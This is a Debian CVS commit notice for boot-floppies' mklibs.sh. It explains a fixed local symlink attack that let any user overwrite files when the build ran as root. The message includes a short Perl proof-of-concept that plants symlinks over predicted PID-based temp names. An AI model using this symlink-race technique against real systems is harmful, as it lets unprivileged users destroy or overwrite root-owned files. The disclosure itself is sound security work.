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Debian Boot CVS: joeyh

CVSROOT:	/cvs/debian-boot
Module name:	boot-floppies
Changes by:	joeyh	01/01/11 12:32:45

Modified files:
	scripts/rootdisk: mklibs.sh 

Log message:
Sigh. Fixed a local symlink attack that allowed any user on the system to
overwrite any file on the system with a list of the symbols in libc when
the boot-floppies were building (which typically runs as root..). Working

system `rm -rf /tmp/nasty`;
mkdir '/tmp/nasty', 0755;
chdir '/tmp/nasty';
chdir '..';
# FIXME: pid wraparound. Plus this could be smarter.
for ($x=$$ + 1; $x < $$ + 100000; $x++) {
symlink("nasty", ",mklibs.$x");
print ".";

set -e should *not* be optional in shell scripts!

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